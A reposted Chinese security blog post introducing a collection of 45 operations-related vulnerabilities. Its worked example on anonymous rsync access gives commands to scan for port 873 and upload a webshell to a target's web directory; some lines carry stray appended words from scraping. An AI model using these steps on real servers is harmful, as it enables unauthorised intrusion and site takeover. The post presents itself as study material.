轉 安全運維的一些洞

0x00 原因web

       有人說:編程是一種美,是一門藝術,享受其中思惟的妙曼身姿,一個有靈魂的程序猿叫作萬物的「造物主」;算法

       而我說:漏洞是一種美,是一個世界,暢遊於黑暗的世界裏探索,一個有個性的白帽子叫作世間的「救世主」。shell

 

0x01 歸納編程

        不知從什麼時候起,養成了一個喜歡看「漏洞」的習慣,烏雲的離開讓不少人傷心而遺憾。不知從什麼時候起,養成了一個喜歡記筆記、總結、思考的習慣,因而有了今天這份paper:安全

 

        或許,不少朋友已經看到過標題,由於以前沒有本身的公衆號在T00Ls發過,後來又被人轉到過愛春秋。如今打算開始嘗試公衆號,想起是時候把它歸入懷中了。服務器

 

0x02 結構運維

       這份 paper 沒有太多我的思路,但卻不失某一漏洞的利用方法及遇到的問題(當時有的沒有解決,然然後來也沒有繼續補充)。僅單純的按照本身的思路,記錄和總結常見的運維相關安全漏洞。不免會有錯誤與不足(包括不全面)之處,還請你們不吝賜教。工具

1)很早以前爲止,共收集運維相關漏洞45例網站

 

 

2)每例結構分爲:基礎知識、漏洞利用、實戰演練(及修復方案)3d

 

以rsync匿名訪問爲例:

--1 基礎知識

rsync 是一個遠程數據同步工具,用 「rsync 算法」提供了一個客戶機和遠程文件服務器的文件同步的快速方法,在同步文件的同時,能夠保持原來文件的權限、時間、軟硬連接等附加信息。

下載文件:

./rsync -vzrtopg --progress --delete username@xxx.xxx.xxx.xxx::out /home/test/getfile

上傳文件:

/user/bin/rsync -vzrtopg --progress /home/test/getfile username@xxx.xxx.xxx.xxx::out

 

--2 利用方法

rsync 默認端口是 873,可以使用 nmap 進行掃描:

nmap –n –open –p 873 x.x.x.x/24

嘗試上傳、下載文件( kali 中):rsync 10.210.208.39::

或 rsync –vvvv rsync://10.210.208.39::

 

--3 實戰演練

獲取文件信息找到網站目錄:# rsync -v xx.xx.xx.xx::

同步本地大馬至遠程服務器,上傳webshell

# rsync -av /root/Desktop/youxiu.aspx xx.xx.xx.xx::Etest

確認是否成功:  # rsync -v xx.xx.xx.xx::Etest

獲取目標webshell:

 

3)每例中多是一類漏洞的集合

好比struts漏洞:

又如web服務器解析漏洞:

 

0x03 結語

        以上漏洞大餐可能時間較久,若是有想繼續完善的朋友能夠留言。

 

PS:以上漏洞僅提供廣大安全技術愛好者研究使用,請勿利用其中的方式去入侵他人網站!

 

 下載連接以下(下載即贊成以上PS中的內容):

更新連接:連接: https://pan.baidu.com/s/1nuTqFTB 密碼: yq9a

相關文章
相關標籤/搜索